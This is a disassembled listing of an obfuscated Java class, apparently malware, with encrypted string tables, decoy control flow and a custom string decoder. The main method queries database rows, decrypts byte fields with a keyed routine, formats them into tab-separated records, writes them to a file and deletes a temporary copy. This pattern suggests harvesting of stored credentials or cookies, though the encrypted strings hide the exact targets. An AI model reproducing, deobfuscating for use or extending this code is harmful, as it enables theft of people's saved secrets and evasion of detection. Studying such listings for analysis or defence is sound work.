       859: iload         6
       861: lload         7
       863: lconst_0
       864: lcmp
       865: ifle          1479
       868: iload         9
       870: ifne          1479
       873: iconst_1
       874: iload         9
       876: lload         7
       878: lconst_0
       879: lcmp
       880: ifle          1075
       883: ifne          1073
       886: goto          890
       889: athrow
       890: if_icmpne     1070
       893: goto          897
       896: athrow
       897: aload         14
       899: iconst_3
       900: invokeinterface #24,  2           // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       905: invokestatic  #74                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       908: astore        16
       910: aload         16
       912: lload         7
       914: lconst_0
       915: lcmp
       916: iflt          933
       919: iload         9
       921: ifne          933
       924: ifnull        1058
       927: goto          931
       930: athrow
       931: aload         16
       933: invokevirtual #109                // Method java/lang/String.isEmpty:()Z
       936: iload         9
       938: ifne          957
       941: ifne          1058
       944: goto          948
       947: athrow
       948: getstatic     #144                // Field p:I
       951: iconst_1
       952: iadd
       953: goto          957
       956: athrow
       957: putstatic     #144                // Field p:I
       960: aload         15
       962: ldc           #13                 // int -2045740560
       964: sipush        -12955
       967: isub
       968: ldc           #13                 // int -2045740560
       970: sipush        -32434
       973: isub
       974: lload         7
       976: l2i
       977: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       980: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       983: aload         14
       985: iconst_1
       986: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       991: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       994: ldc           #5                  // String \n
       996: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       999: aload         14
      1001: iconst_2
      1002: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1007: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1010: ldc           #13                 // int -2045740560
      1012: sipush        -12997
      1015: isub
      1016: ldc           #13                 // int -2045740560
      1018: sipush        -20437
      1021: isub
      1022: lload         7
      1024: l2i
      1025: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1028: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1031: aload         16
      1033: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1036: ldc           #13                 // int -2045740560
      1038: sipush        -12946
      1041: isub
      1042: ldc           #13                 // int -2045740560
      1044: sipush        -15709
      1047: isub
      1048: lload         7
      1050: l2i
      1051: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1054: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1057: pop
      1058: iload         9
      1060: lload         7
      1062: lconst_0
      1063: lcmp
      1064: iflt          1072
      1067: ifeq          845
      1070: iload         6
      1072: iconst_2
      1073: iload         9
      1075: ifne          1338
      1078: if_icmpne     1330
      1081: goto          1085
      1084: athrow
      1085: aload         14
      1087: iconst_5
      1088: invokeinterface #24,  2           // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1093: aload         14
      1095: iconst_1
      1096: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1101: invokestatic  #168                // Method a/b/d/dec.k3l:([BLjava/lang/String;)Ljava/lang/String;
      1104: astore        16
      1106: lload         7
      1108: lconst_0
      1109: lcmp
      1110: ifle          1139
      1113: iload         9
      1115: ifne          1139
      1118: aload         16
      1120: ifnull        1318
      1123: goto          1127
      1126: athrow
      1127: getstatic     #323                // Field l:I
      1130: iconst_1
      1131: iadd
      1132: putstatic     #323                // Field l:I
      1135: goto          1139
      1138: athrow
      1139: aload         15
      1141: aload         14
      1143: iconst_1
      1144: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1149: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1152: ldc           #13                 // int -2045740560
      1154: sipush        -13004
      1157: isub
      1158: ldc           #13                 // int -2045740560
      1160: sipush        -26456
      1163: isub
      1164: lload         7
      1166: l2i
      1167: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1170: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1173: aload         14
      1175: iconst_3
      1176: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1181: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1184: lload         7
      1186: lconst_0
      1187: lcmp
      1188: ifle          1201
      1191: ldc           #10                 // String \t
      1193: iload         9
      1195: ifne          1246
      1198: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1201: aload         14
      1203: iconst_4
      1204: invokeinterface #260,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1209: iconst_1
      1210: lload         7
      1212: lconst_0
      1213: lcmp
      1214: ifle          1261
      1217: if_icmpne     1249
      1220: goto          1224
      1223: athrow
      1224: ldc           #13                 // int -2045740560
      1226: sipush        -12959
      1229: isub
      1230: ldc           #13                 // int -2045740560
      1232: sipush        -20833
      1235: isub
      1236: lload         7
      1238: l2i
      1239: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1242: goto          1246
      1245: athrow
      1246: goto          1267
      1249: ldc           #13                 // int -2045740560
      1251: sipush        -12994
      1254: isub
      1255: ldc           #1                  // int 2045740560
      1257: sipush        5611
      1260: isub
      1261: lload         7
      1263: l2i
      1264: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1267: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1270: ldc           #13                 // int -2045740560
      1272: sipush        -12995
      1275: isub
      1276: ldc           #1                  // int 2045740560
      1278: sipush        4832
      1281: isub
      1282: lload         7
      1284: l2i
      1285: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1288: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1291: aload         14
      1293: iconst_2
      1294: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1299: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1302: ldc           #10                 // String \t
      1304: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1307: aload         16
      1309: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1312: ldc           #5                  // String \n
      1314: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1317: pop
      1318: iload         9
      1320: lload         7
      1322: lconst_0
      1323: lcmp
      1324: ifle          1332
      1327: ifeq          845
      1330: iload         6
      1332: iload         9
      1334: ifne          856
      1337: iconst_3
      1338: if_icmpne     845
      1341: aload         14
      1343: iconst_2
      1344: invokeinterface #24,  2           // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1349: invokestatic  #74                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1352: astore        16
      1354: iload         9
      1356: ifne          1380
      1359: aload         16
      1361: ifnull        1462
      1364: goto          1368
      1367: athrow
      1368: getstatic     #344                // Field q:I
      1371: iconst_1
      1372: iadd
      1373: putstatic     #344                // Field q:I
      1376: goto          1380
      1379: athrow
      1380: aload         15
      1382: ldc           #13                 // int -2045740560
      1384: sipush        -12966
      1387: isub
      1388: ldc           #13                 // int -2045740560
      1390: sipush        -3775
      1393: isub
      1394: lload         7
      1396: l2i
      1397: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1400: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1403: aload         14
      1405: iconst_1
      1406: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1411: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1414: ldc           #13                 // int -2045740560
      1416: sipush        -12973
      1419: isub
      1420: ldc           #1                  // int 2045740560
      1422: sipush        32169
      1425: isub
      1426: lload         7
      1428: l2i
      1429: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1432: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1435: aload         16
      1437: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1440: ldc           #13                 // int -2045740560
      1442: sipush        -12946
      1445: isub
      1446: ldc           #13                 // int -2045740560
      1448: sipush        -15709
      1451: isub
      1452: lload         7
      1454: l2i
      1455: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1458: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1461: pop
      1462: iload         9
      1464: ifeq          845
      1467: lload         7
      1469: lconst_0
      1470: lcmp
      1471: iflt          859
      1474: aload         15
      1476: invokevirtual #316                // Method java/lang/StringBuilder.length:()I
      1479: ifle          1532
      1482: aload         4
      1484: aload         5
      1486: ldc           #13                 // int -2045740560
      1488: sipush        -12961
      1491: isub
      1492: ldc           #1                  // int 2045740560
      1494: sipush        26457
      1497: isub
      1498: lload         7
      1500: l2i
      1501: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
      1504: dup_x2
      1505: pop
      1506: ldc           #8                  // String /
      1508: swap
      1509: invokedynamic #56,  0             // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
      1514: goto          1518
      1517: athrow
      1518: aload         15
      1520: invokevirtual #272                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
      1523: getstatic     #315                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
      1526: invokevirtual #292                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
      1529: invokestatic  #208                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
      1532: lload         7
      1534: lconst_0
      1535: lcmp
      1536: iflt          1560
      1539: aload         14
      1541: iload         9
      1543: ifne          1555
      1546: ifnull        1608
      1549: goto          1553
      1552: athrow
      1553: aload         14
      1555: invokeinterface #192,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1560: goto          1608
      1563: astore        15
      1565: lload         7
      1567: lconst_0
      1568: lcmp
      1569: iflt          1593
      1572: aload         14
      1574: iload         9
      1576: ifne          1588
      1579: ifnull        1605
      1582: goto          1586
      1585: athrow
      1586: aload         14
      1588: invokeinterface #192,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1593: goto          1605
      1596: astore        16
      1598: aload         15
      1600: aload         16
      1602: invokevirtual #186                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1605: aload         15
      1607: athrow
      1608: lload         7
      1610: lconst_0
      1611: lcmp
      1612: ifle          1636
      1615: aload         13
      1617: iload         9
      1619: ifne          1631
      1622: ifnull        1684
      1625: goto          1629
      1628: athrow
      1629: aload         13
      1631: invokeinterface #318,  1          // InterfaceMethod java/sql/Statement.close:()V
      1636: goto          1684
      1639: astore        14
      1641: lload         7
      1643: lconst_0
      1644: lcmp
      1645: ifle          1669
      1648: aload         13
      1650: iload         9
      1652: ifne          1664
      1655: ifnull        1681
      1658: goto          1662
      1661: athrow
      1662: aload         13
      1664: invokeinterface #318,  1          // InterfaceMethod java/sql/Statement.close:()V
      1669: goto          1681
      1672: astore        15
      1674: aload         14
      1676: aload         15
      1678: invokevirtual #186                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1681: aload         14
      1683: athrow
      1684: lload         7
      1686: lconst_0
      1687: lcmp
      1688: iflt          1712
      1691: aload         12
      1693: iload         9
      1695: ifne          1707
      1698: ifnull        1760
      1701: goto          1705
      1704: athrow
      1705: aload         12
      1707: invokeinterface #117,  1          // InterfaceMethod java/sql/Connection.close:()V
      1712: goto          1760
      1715: astore        13
      1717: lload         7
      1719: lconst_0
      1720: lcmp
      1721: iflt          1745
      1724: aload         12
      1726: iload         9
      1728: ifne          1740
      1731: ifnull        1757
      1734: goto          1738
      1737: athrow
      1738: aload         12
      1740: invokeinterface #117,  1          // InterfaceMethod java/sql/Connection.close:()V
      1745: goto          1757
      1748: astore        14
      1750: aload         13
      1752: aload         14
      1754: invokevirtual #186                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1757: aload         13
      1759: athrow
      1760: aload         11
      1762: invokevirtual #198                // Method java/io/File.delete:()Z
      1765: pop
      1766: goto          1791
      1769: astore        12
      1771: aload         11
      1773: invokevirtual #198                // Method java/io/File.delete:()Z
      1776: pop
      1777: goto          1791
      1780: astore        20
      1782: aload         11
      1784: invokevirtual #198                // Method java/io/File.delete:()Z
      1787: pop
      1788: aload         20
      1790: athrow
      1791: return
      Exception table:
         from    to  target type
          1479  1514  1517   Class java/lang/Throwable
          1359  1376  1379   Class java/lang/Throwable
          1354  1364  1367   Class java/lang/Throwable
          1198  1242  1245   Class java/lang/Throwable
          1139  1220  1223   Class java/lang/Throwable
          1118  1135  1138   Class java/lang/Throwable
          1106  1123  1126   Class java/lang/Throwable
          1073  1081  1084   Class java/lang/Throwable
           941   953   956   Class java/lang/Throwable
           933   944   947   Class java/lang/Throwable
           910   927   930   Class java/lang/Throwable
           873   893   896   Class java/lang/Throwable
           859   886   889   Class java/lang/Throwable
           826   852   855   Class java/lang/Throwable
           604   654   654   Class java/lang/Throwable
           595   607   610   Class java/lang/Throwable
           519   541   544   Class java/lang/Throwable
           363   378   381   Class java/lang/Throwable
           352   366   369   Class java/lang/Throwable
           347   359   362   Class java/lang/Throwable
           313   330   333   Class java/lang/Throwable
           305   316   319   Class java/lang/Throwable
           142   152   155   Class java/lang/Throwable
            95   110   113   Class java/lang/Throwable
            88   102   105   Class java/lang/Throwable
            78    91    94   Class java/lang/Throwable
           296  1532  1563   Class java/lang/Throwable
          1586  1593  1596   Class java/lang/Throwable
          1565  1582  1585   Class java/lang/Throwable
          1532  1549  1552   Class java/lang/Throwable
           286  1608  1639   Class java/lang/Throwable
          1662  1669  1672   Class java/lang/Throwable
          1641  1658  1661   Class java/lang/Throwable
          1608  1625  1628   Class java/lang/Throwable
           277  1684  1715   Class java/lang/Throwable
          1738  1745  1748   Class java/lang/Throwable
           196   236  1769   Class java/lang/Exception
          1717  1734  1737   Class java/lang/Throwable
          1684  1701  1704   Class java/lang/Throwable
           243  1760  1769   Class java/lang/Exception
           196   236  1780   any
           243  1760  1780   any
          1769  1771  1780   any
          1780  1782  1780   any

  static {};
    Code:
         0: ldc2_w        #369                // long 88607924557495l
         3: lstore        13
         5: bipush        51
         7: anewarray     #89                 // class java/lang/String
        10: astore        11
        12: iconst_0
        13: istore        9
        15: ldc           #9                  // String ©\u00198³ÕªÃ\u000b\u000f)É¸\u00929kÊ\n,U\bû\u009c»\u0081 ¨n×\u0003òæ~\u0002ÃÛ\u0006Eæ}ù\u009df\u0007\u0085Ù¼¦<ú¾\u0011\u008a\u0087Ò\u0003Ô\u009bDâÝñ «6\u0010ÄÌ¹\u0007\u000f=2EÒiÊ\u000f4¥\u0093²\u0098ºK\u001cjÝ±-ÚwGKÊ\u001eÊÓ Ä®\u0002ÅM[û\u0089ÕÌ:Èï§&\u0012Qkk\u0088Ü>µS%X$ðtFOëwø\u0080¶íðÅ\u0092rÆ¯\n@Ò:Ú¼§®¨Ú\u0088\u008b+ñ[?gw\u0095Ä3¡\u0006ôÍÃñ\b*Y\u0089cvï\u009e?\u0007>Öe\u008b8\u0015\u0081\r \u009fÛunÛ\u0097¶ûö®2\\\t{\u0003«7\'\u0088bú7\tõ\u0014\u0001\u0013\u0010£ÚÌ\u0093\f7.\u0086\u009aÈ|=\u009dÿNß\u009e\u0013Ùfò[Zw?\f!\u008bT®á\u001f;µ{½\u001e\râÅ§´7zµLb \u009dø:\b*ø|N\u009a\u008bZv\u0002¥\')\bU@µÐ\u0016\fN`\u0089c\u009cì\u0014ÖØíó\u009eâÇ_-ú\u001cä#\u008aè°\\\tS\u0081KÏ\u0005õ0;è\t5÷~¬\t7Ì>ÃbzòÜNbwönÎ\u009cq-ôY;E\u001eÝUcV\u008c¡\u001e\u0097%.o\u0002\u0004)â\u009f\u001eÐÑ\u001eP¦¾þ\u000fï)Æ\n\u0086¦î\u0089Z\u0082u¾ÿÑ\u009b½Çyeu\u0083Hl\u0092\u001f3¡E&¬®ða4ô¶Víåã[@!Ñl\u009b\u0095\u0019\u008b!\u0087\u0082§;ÔÐ(\u001d\u0012â]\u0084\u000b\u0086í1ýI\u0012©Å~âø´<\n\u0093B§YM\u0090\t\u0004­aô3FÆé<bÒÖÀ\u0004N¨¤ð\u0007°,Â\rU.à\n¬6Ñ\u0095 ÑBT¶@\f±½\u0095\u0084Ùë\u0086\' \u0097\u008dM#úÖ\u001eÅ\u001b\u0018u\u008fO±\u0086\u009bPôAÄ\u001fpÀ\u0092\fQT;3ÜÆ\u008dTPË\u0015¡\u0002\u0015\u000b»Û_æ@ò1³A\u0003<\u0007m\u001b+2ñ\"¸\u0007\u0002<L\u001a\"m}\u0006\u008aÕ1é¼\r\u000b\u001aú\u0097×ÿuµ\u0097Ò\u0087l\u0003\u0003i\u0082\u0005k±I´Ö\fP`ñùå\u0013ëéÞ»ç\u0092\u0011L±\nÅÏC\'ù±\u0092-Ç\u0087\u009dò}\u007f\b«HLX\u009cI\u009a.\u000b\'{h\u008fÒjìý\u0082p§\u000e\u0089¢\u0086À9;\u0012&ò¤lO\u009dÂ\u0006p\u001c\u0092°pç\bÉ¿æû?\u0093\u0090q\u0012ûÞ\'\u0089¾âOÿ\u001b\b\u007fä\u0087Ä£\u009b*çR\u008dA\"8½¹\rª¬¥Û\u0089íQé\u0089­N\u008f\u0000hÇ¢Ç©\u008d\u0017Ö\u008c\\ (\u0015Ómí\u0096åz*¢\u0091\u0007I\u0017*Þè»@}Ì\fx\u0010 ü\u0096Aî¬RS(W\u008b\u0017\u0089jª,e¢A­¨O^FÆ\u0013\u0090\u000b\u0006²b\u0007Ø\u0084\u009d\\\u009cþ¥s\\\u0004\u0018\u0090ú¬å\u0007«är\u008b\u0081\u0007^h\u0005*y\u0098Cøû\u0084îÿ\u0012\u00825¯^A\u0091g§R\u0098qe\u008a\u0005\u0016@R«>Vye\bÏ¯e\u001f\u0081\u008fÁféÏ#â?\u0012Ù\u0099\u0092ñ\u0019ò!{D\u00169|3ø¶ ´Á@ÿo\u009b\u0010U\u0094\u0004Tâ·Ò\u000b¢éÏ\\É¬Ôl\u001aj\u0002S\u0006N¤Wð¼q>\u0007Þô\u0097\u008eR÷T
        17: dup
        18: astore        8
        20: invokevirtual #291                // Method java/lang/String.length:()I
        23: istore        10
        25: bipush        7
        27: istore        7
        29: iconst_m1
        30: istore        6
        32: iinc          6, 1
        35: aload         8
        37: iload         6
        39: dup
        40: iload         7
        42: iadd
        43: invokevirtual #175                // Method java/lang/String.substring:(II)Ljava/lang/String;
        46: iconst_m1
        47: goto          184
        50: aload         11
        52: swap
        53: iload         9
        55: iinc          9, 1
        58: swap
        59: aastore
        60: iload         6
        62: iload         7
        64: iadd
        65: dup
        66: istore        6
        68: iload         10
        70: if_icmpge     85
        73: aload         8
        75: iload         6
        77: invokevirtual #215                // Method java/lang/String.charAt:(I)C
        80: istore        7
        82: goto          32
        85: ldc           #15                 // String Ç§kä\u0094\"(ß\u0006ÓPéäfÒò\u0081÷çµ\u0099¥ñ©\u000e=\u008fm²®7â³\u0011±È%y\u0099\u0001\r%\u0016\tâ±\u0007T\u0090F\u0012\u009f\u0085«
        87: dup
        88: astore        8
        90: invokevirtual #291                // Method java/lang/String.length:()I
        93: istore        10
        95: bipush        46
        97: istore        7
        99: iconst_m1
       100: istore        6
       102: iinc          6, 1
       105: aload         8
       107: iload         6
       109: dup
       110: iload         7
       112: iadd
       113: invokevirtual #175                // Method java/lang/String.substring:(II)Ljava/lang/String;
       116: iconst_0
       117: goto          184
       120: aload         11
       122: swap
       123: iload         9
       125: iinc          9, 1
       128: swap
       129: aastore
       130: iload         6
       132: iload         7
       134: iadd
       135: dup
       136: istore        6
       138: iload         10
       140: if_icmpge     155
       143: aload         8
       145: iload         6
       147: invokevirtual #215                // Method java/lang/String.charAt:(I)C
       150: istore        7
       152: goto          102
       155: aload         11
       157: putstatic     #160                // Field a:[Ljava/lang/String;
       160: bipush        51
       162: anewarray     #89                 // class java/lang/String
       165: putstatic     #120                // Field b:[Ljava/lang/String;
       168: ldc           #16                 // int -1545720120
       170: ldc           #3                  // int 1545705814
       172: lload         13
       174: l2i
       175: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       178: putstatic     #355                // Field s:Ljava/lang/String;
       181: goto          336
       184: swap
       185: invokevirtual #65                 // Method java/lang/String.toCharArray:()[C
       188: dup
       189: arraylength
       190: swap
       191: iconst_0
       192: istore        12
       194: swap
       195: dup_x1
       196: iconst_1
       197: if_icmpgt     295
       200: dup
       201: iload         12
       203: dup2
       204: caload
       205: iload         12
       207: bipush        7
       209: irem
       210: tableswitch   { // 0 to 5
                       0: 248
                       1: 253
                       2: 258
                       3: 262
                       4: 267
                       5: 272
                 default: 277
            }
       248: bipush        47
       250: goto          279
       253: bipush        12
       255: goto          279
       258: iconst_3
       259: goto          279
       262: bipush        57
       264: goto          279
       267: bipush        31
       269: goto          279
       272: bipush        32
       274: goto          279
       277: bipush        82
       279: ixor
       280: i2c
       281: castore
       282: iinc          12, 1
       285: swap
       286: dup_x1
       287: ifne          295
       290: dup2
       291: swap
       292: goto          203
       295: swap
       296: dup_x1
       297: iload         12
       299: if_icmpgt     200
       302: new           #89                 // class java/lang/String
       305: dup_x1
       306: swap
       307: invokespecial #27                 // Method java/lang/String."<init>":([C)V
       310: invokevirtual #298                // Method java/lang/String.intern:()Ljava/lang/String;
       313: swap
       314: pop
       315: swap
       316: tableswitch   { // 0 to 0
                       0: 120
                 default: 50
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #19                 // String 0\u008f\u0098t¢úT(jç\u0015ÛÄaë&L³û÷[ß\u001f\u0093
       345: dup
       346: astore_2
       347: invokevirtual #291                // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #175                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #18                 // String ISO-8859-1
       364: invokevirtual #224                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #359                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #359                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #359                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #359                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #359                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #359                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #359                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #359                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #76                 // Field c:[J
       492: iconst_3
       493: anewarray     #352                // class java/lang/Long
       496: putstatic     #137                // Field d:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         13
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: ldc           #6                  // int -1545708510
       515: sipush        -11556
       518: iadd
       519: ldc           #6                  // int -1545708510
       521: sipush        -3503
       524: isub
       525: lload         13
       527: l2i
       528: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       531: invokestatic  #203                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       534: ldc           #6                  // int -1545708510
       536: sipush        -11616
       539: iadd
       540: ldc           #2                  // int 1545708510
       542: sipush        8623
       545: isub
       546: lload         13
       548: l2i
       549: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       552: invokedynamic #34,  0             // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       557: putstatic     #36                 // Field y:Ljava/lang/String;
       560: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        14425
         6: ixor
         7: ldc           #4                  // int 65535
         9: iand
        10: istore_3
        11: getstatic     #120                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #160                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #65                 // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1077
                       2: 1083
                       3: 1089
                       4: 1095
                       5: 1100
                       6: 1106
                       7: 1111
                       8: 1117
                       9: 1122
                      10: 1128
                      11: 1133
                      12: 1138
                      13: 1144
                      14: 1149
                      15: 1155
                      16: 1160
                      17: 1166
                      18: 1172
                      19: 1177
                      20: 1183
                      21: 1188
                      22: 1194
                      23: 1200
                      24: 1206
                      25: 1211
                      26: 1216
                      27: 1222
                      28: 1228
                      29: 1233
                      30: 1239
                      31: 1244
                      32: 1249
                      33: 1254
                      34: 1259
                      35: 1264
                      36: 1270
                      37: 1276
                      38: 1282
                      39: 1288
                      40: 1293
                      41: 1298
                      42: 1304
                      43: 1310
                      44: 1316
                      45: 1322
                      46: 1328
                      47: 1333
                      48: 1338
                      49: 1343
                      50: 1348
                      51: 1354
                      52: 1360
                      53: 1365
                      54: 1371
                      55: 1377
                      56: 1382
                      57: 1388
                      58: 1394
                      59: 1400
                      60: 1406
                      61: 1411
                      62: 1416
                      63: 1422
                      64: 1428
                      65: 1433
                      66: 1438
                      67: 1444
                      68: 1449
                      69: 1455
                      70: 1460
                      71: 1466
                      72: 1471
                      73: 1476
                      74: 1482
                      75: 1487
                      76: 1493
                      77: 1499
                      78: 1504
                      79: 1510
                      80: 1514
                      81: 1519
                      82: 1524
                      83: 1529
                      84: 1535
                      85: 1541
                      86: 1546
                      87: 1551
                      88: 1556
                      89: 1561
                      90: 1567
                      91: 1573
                      92: 1579
                      93: 1584
                      94: 1589
                      95: 1595
                      96: 1600
                      97: 1605
                      98: 1610
                      99: 1615
                     100: 1621
                     101: 1627
                     102: 1632
                     103: 1637
                     104: 1642
                     105: 1648
                     106: 1654
                     107: 1658
                     108: 1664
                     109: 1670
                     110: 1675
                     111: 1680
                     112: 1685
                     113: 1690
                     114: 1695
                     115: 1699
                     116: 1704
                     117: 1709
                     118: 1714
                     119: 1720
                     120: 1726
                     121: 1731
                     122: 1737
                     123: 1742
                     124: 1747
                     125: 1753
                     126: 1759
                     127: 1765
                     128: 1771
                     129: 1776
                     130: 1781
                     131: 1787
                     132: 1792
                     133: 1797
                     134: 1803
                     135: 1809
                     136: 1814
                     137: 1820
                     138: 1826
                     139: 1830
                     140: 1835
                     141: 1841
                     142: 1846
                     143: 1852
                     144: 1857
                     145: 1863
                     146: 1868
                     147: 1873
                     148: 1878
                     149: 1884
                     150: 1890
                     151: 1895
                     152: 1900
                     153: 1906
                     154: 1911
                     155: 1916
                     156: 1921
                     157: 1927
                     158: 1933
                     159: 1939
                     160: 1944
                     161: 1950
                     162: 1956
                     163: 1962
                     164: 1967
                     165: 1973
                     166: 1979
                     167: 1985
                     168: 1991
                     169: 1996
                     170: 2002
                     171: 2007
                     172: 2013
                     173: 2019
                     174: 2025
                     175: 2030
                     176: 2036
                     177: 2042
                     178: 2047
                     179: 2053
                     180: 2058
                     181: 2063
                     182: 2068
                     183: 2073
                     184: 2079
                     185: 2084
                     186: 2090
                     187: 2096
                     188: 2102
                     189: 2107
                     190: 2112
                     191: 2118
                     192: 2123
                     193: 2128
                     194: 2134
                     195: 2139
                     196: 2145
                     197: 2150
                     198: 2156
                     199: 2160
                     200: 2166
                     201: 2171
                     202: 2177
                     203: 2182
                     204: 2187
                     205: 2192
                     206: 2198
                     207: 2203
                     208: 2208
                     209: 2214
                     210: 2220
                     211: 2226
                     212: 2231
                     213: 2236
                     214: 2242
                     215: 2247
                     216: 2252
                     217: 2257
                     218: 2263
                     219: 2269
                     220: 2275
                     221: 2280
                     222: 2285
                     223: 2291
                     224: 2296
                     225: 2301
